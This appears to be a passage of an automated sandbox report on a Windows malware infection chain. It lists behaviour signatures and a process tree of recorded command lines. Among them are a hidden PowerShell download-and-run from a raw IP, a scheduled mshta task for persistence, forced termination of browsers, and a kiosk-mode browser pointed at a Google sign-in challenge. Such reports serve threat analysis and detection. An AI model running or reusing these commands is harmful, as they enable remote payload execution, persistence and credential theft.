Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel C:\Program Files\Mozilla Firefox\firefox.exe N/A

Kills process with taskkill

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A

Modifies system certificate store

defense_evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Users\Admin\AppData\Local\Temp\10107900101\2a1bc9d8d6.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = [data omitted] C:\Users\Admin\AppData\Local\Temp\10107900101\2a1bc9d8d6.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = [data omitted] C:\Users\Admin\AppData\Local\Temp\10107900101\2a1bc9d8d6.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Users\Admin\AppData\Local\Temp\10107980101\FvbuInU.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = [data omitted] C:\Users\Admin\AppData\Local\Temp\10107980101\FvbuInU.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107870101\4665ecc86d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107890101\a56a18c370.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107900101\2a1bc9d8d6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107900101\2a1bc9d8d6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107900101\2a1bc9d8d6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107900101\2a1bc9d8d6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107900101\2a1bc9d8d6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107910101\a2a6d35a13.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107920101\a3f26c3fce.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107930101\b668242231.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107930101\b668242231.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107950101\cnntXtU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107980101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107980101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107980101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107980101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107980101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107980101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108010101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108010101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108010101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108010101\ce4pMzk.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10107950101\cnntXtU.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10108010101\ce4pMzk.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107930101\b668242231.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107930101\b668242231.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107930101\b668242231.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107930101\b668242231.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107930101\b668242231.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107930101\b668242231.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107930101\b668242231.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107930101\b668242231.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107930101\b668242231.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107930101\b668242231.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107960101\nhDLtPT.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107950101\cnntXtU.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2552 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe C:\Windows\SysWOW64\cmd.exe
PID 2552 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe C:\Windows\SysWOW64\cmd.exe
PID 2552 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe C:\Windows\SysWOW64\cmd.exe
PID 2552 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe C:\Windows\SysWOW64\cmd.exe
PID 2552 wrote to memory of 1904 N/A C:\Users\Admin\AppData\Local\Temp\19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe C:\Windows\SysWOW64\mshta.exe
PID 2552 wrote to memory of 1904 N/A C:\Users\Admin\AppData\Local\Temp\19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe C:\Windows\SysWOW64\mshta.exe
PID 2552 wrote to memory of 1904 N/A C:\Users\Admin\AppData\Local\Temp\19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe C:\Windows\SysWOW64\mshta.exe
PID 2552 wrote to memory of 1904 N/A C:\Users\Admin\AppData\Local\Temp\19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe C:\Windows\SysWOW64\mshta.exe
PID 1036 wrote to memory of 1784 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1036 wrote to memory of 1784 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1036 wrote to memory of 1784 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1036 wrote to memory of 1784 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1904 wrote to memory of 2084 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1904 wrote to memory of 2084 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1904 wrote to memory of 2084 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1904 wrote to memory of 2084 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2084 wrote to memory of 3068 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE
PID 2084 wrote to memory of 3068 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE
PID 2084 wrote to memory of 3068 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE
PID 2084 wrote to memory of 3068 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE
PID 3068 wrote to memory of 2352 N/A C:\Users\Admin\AppData\Local\TempZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 3068 wrote to memory of 2352 N/A C:\Users\Admin\AppData\Local\TempZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 3068 wrote to memory of 2352 N/A C:\Users\Admin\AppData\Local\TempZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 3068 wrote to memory of 2352 N/A C:\Users\Admin\AppData\Local\TempZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2352 wrote to memory of 3044 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107870101\4665ecc86d.exe
PID 2352 wrote to memory of 3044 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107870101\4665ecc86d.exe
PID 2352 wrote to memory of 3044 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107870101\4665ecc86d.exe
PID 2352 wrote to memory of 3044 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107870101\4665ecc86d.exe
PID 2352 wrote to memory of 984 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe
PID 2352 wrote to memory of 984 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe
PID 2352 wrote to memory of 984 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe
PID 2352 wrote to memory of 984 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe
PID 984 wrote to memory of 1548 N/A C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe
PID 984 wrote to memory of 1548 N/A C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe
PID 984 wrote to memory of 1548 N/A C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe
PID 984 wrote to memory of 1548 N/A C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe
PID 984 wrote to memory of 1548 N/A C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe
PID 984 wrote to memory of 1548 N/A C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe
PID 984 wrote to memory of 1548 N/A C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe
PID 984 wrote to memory of 1548 N/A C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe
PID 984 wrote to memory of 1548 N/A C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe
PID 984 wrote to memory of 1548 N/A C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe
PID 984 wrote to memory of 1740 N/A C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe C:\Windows\SysWOW64\WerFault.exe
PID 984 wrote to memory of 1740 N/A C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe C:\Windows\SysWOW64\WerFault.exe
PID 984 wrote to memory of 1740 N/A C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe C:\Windows\SysWOW64\WerFault.exe
PID 984 wrote to memory of 1740 N/A C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe C:\Windows\SysWOW64\WerFault.exe
PID 1548 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe C:\Windows\SysWOW64\WerFault.exe
PID 1548 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe C:\Windows\SysWOW64\WerFault.exe
PID 1548 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe C:\Windows\SysWOW64\WerFault.exe
PID 1548 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe C:\Windows\SysWOW64\WerFault.exe
PID 3044 wrote to memory of 1412 N/A C:\Users\Admin\AppData\Local\Temp\10107870101\4665ecc86d.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 3044 wrote to memory of 1412 N/A C:\Users\Admin\AppData\Local\Temp\10107870101\4665ecc86d.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 3044 wrote to memory of 1412 N/A C:\Users\Admin\AppData\Local\Temp\10107870101\4665ecc86d.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 3044 wrote to memory of 1412 N/A C:\Users\Admin\AppData\Local\Temp\10107870101\4665ecc86d.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 3044 wrote to memory of 1412 N/A C:\Users\Admin\AppData\Local\Temp\10107870101\4665ecc86d.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 3044 wrote to memory of 1412 N/A C:\Users\Admin\AppData\Local\Temp\10107870101\4665ecc86d.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 3044 wrote to memory of 1412 N/A C:\Users\Admin\AppData\Local\Temp\10107870101\4665ecc86d.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 3044 wrote to memory of 1412 N/A C:\Users\Admin\AppData\Local\Temp\10107870101\4665ecc86d.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 3044 wrote to memory of 1412 N/A C:\Users\Admin\AppData\Local\Temp\10107870101\4665ecc86d.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 3044 wrote to memory of 1412 N/A C:\Users\Admin\AppData\Local\Temp\10107870101\4665ecc86d.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 3044 wrote to memory of 1412 N/A C:\Users\Admin\AppData\Local\Temp\10107870101\4665ecc86d.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 2352 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107890101\a56a18c370.exe
PID 2352 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107890101\a56a18c370.exe
PID 2352 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107890101\a56a18c370.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe

"C:\Users\Admin\AppData\Local\Temp\19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn 7p7BqmaXq2n /tr "mshta C:\Users\Admin\AppData\Local\Temp\yJVRHf66T.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta C:\Users\Admin\AppData\Local\Temp\yJVRHf66T.hta

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn 7p7BqmaXq2n /tr "mshta C:\Users\Admin\AppData\Local\Temp\yJVRHf66T.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'ZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Local\TempZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE

"C:\Users\Admin\AppData\Local\TempZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"

C:\Users\Admin\AppData\Local\Temp\10107870101\4665ecc86d.exe

"C:\Users\Admin\AppData\Local\Temp\10107870101\4665ecc86d.exe"

C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe

"C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe"

C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe

"C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 984 -s 508

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1548 -s 1020

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Users\Admin\AppData\Local\Temp\10107890101\a56a18c370.exe

"C:\Users\Admin\AppData\Local\Temp\10107890101\a56a18c370.exe"

C:\Users\Admin\AppData\Local\Temp\10107900101\2a1bc9d8d6.exe

"C:\Users\Admin\AppData\Local\Temp\10107900101\2a1bc9d8d6.exe"

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Users\Admin\AppData\Local\Temp\10107910101\a2a6d35a13.exe

"C:\Users\Admin\AppData\Local\Temp\10107910101\a2a6d35a13.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2648 -s 1204

C:\Users\Admin\AppData\Local\Temp\10107920101\a3f26c3fce.exe

"C:\Users\Admin\AppData\Local\Temp\10107920101\a3f26c3fce.exe"

C:\Users\Admin\AppData\Local\Temp\10107930101\b668242231.exe

"C:\Users\Admin\AppData\Local\Temp\10107930101\b668242231.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM firefox.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM chrome.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM msedge.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM opera.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM brave.exe /T

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2840.0.994059294\268589583" -parentBuildID 20221007134813 -prefsHandle 1216 -prefMapHandle 1208 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6286e659-a441-4882-a98a-0a5ee3cdc511} 2840 "\\.\pipe\gecko-crash-server-pipe.2840" 1292 b6ba358 gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2840.1.650304462\1396595912" -parentBuildID 20221007134813 -prefsHandle 1488 -prefMapHandle 1484 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5e3ef407-e24a-4d03-8b85-0c5c0aa613a5} 2840 "\\.\pipe\gecko-crash-server-pipe.2840" 1500 d73f58 socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2840.2.1799686709\1027310904" -childID 1 -isForBrowser -prefsHandle 2068 -prefMapHandle 2064 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 892 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5363fbb2-0994-4857-95eb-e7a2926154be} 2840 "\\.\pipe\gecko-crash-server-pipe.2840" 2080 19da9058 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2840.3.550897298\1798261468" -childID 2 -isForBrowser -prefsHandle 2896 -prefMapHandle 2888 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 892 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6f518dac-b087-470d-9016-eaf44777df06} 2840 "\\.\pipe\gecko-crash-server-pipe.2840" 2916 d62d58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2840.4.931231338\790430380" -childID 3 -isForBrowser -prefsHandle 3944 -prefMapHandle 3940 -prefsLen 26432 -prefMapSize 233444 -jsInitHandle 892 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3d67aeed-8ac1-42bd-b36f-e1fad7f623f6} 2840 "\\.\pipe\gecko-crash-server-pipe.2840" 3956 208dad58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2840.5.1751415405\1535557933" -childID 4 -isForBrowser -prefsHandle 4064 -prefMapHandle 4068 -prefsLen 26432 -prefMapSize 233444 -jsInitHandle 892 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8717bd4e-e160-44c8-ab53-2f49ecb2f066} 2840 "\\.\pipe\gecko-crash-server-pipe.2840" 4052 208db058 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2840.6.701966344\1456685151" -childID 5 -isForBrowser -prefsHandle 4228 -prefMapHandle 4232 -prefsLen 26432 -prefMapSize 233444 -jsInitHandle 892 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {2376d85f-4b17-4b2b-a188-0facedd92900} 2840 "\\.\pipe\gecko-crash-server-pipe.2840" 4216 20ef7b58 tab

C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe

"C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe"

C:\Users\Admin\AppData\Local\Temp\10107950101\cnntXtU.exe

"C:\Users\Admin\AppData\Local\Temp\10107950101\cnntXtU.exe"

C:\Users\Admin\AppData\Local\Temp\10107960101\nhDLtPT.exe

"C:\Users\Admin\AppData\Local\Temp\10107960101\nhDLtPT.exe"

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\10107970101\Ps7WqSx.exe

"C:\Users\Admin\AppData\Local\Temp\10107970101\Ps7WqSx.exe"

C:\Users\Admin\AppData\Local\Temp\10107980101\FvbuInU.exe

"C:\Users\Admin\AppData\Local\Temp\10107980101\FvbuInU.exe"

C:\Users\Admin\AppData\Local\Temp\10107990101\SvhQA35.exe

"C:\Users\Admin\AppData\Local\Temp\10107990101\SvhQA35.exe"

C:\Users\Admin\AppData\Local\Temp\onefile_3644_133856914229929000\chromium.exe

C:\Users\Admin\AppData\Local\Temp\10107990101\SvhQA35.exe

C:\Users\Admin\AppData\Local\Temp\10108000101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10108000101\mAtJWNv.exe"

C:\Users\Admin\AppData\Local\Temp\10108000101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10108000101\mAtJWNv.exe"

C:\Windows\SysWOW64\WerFault.exe

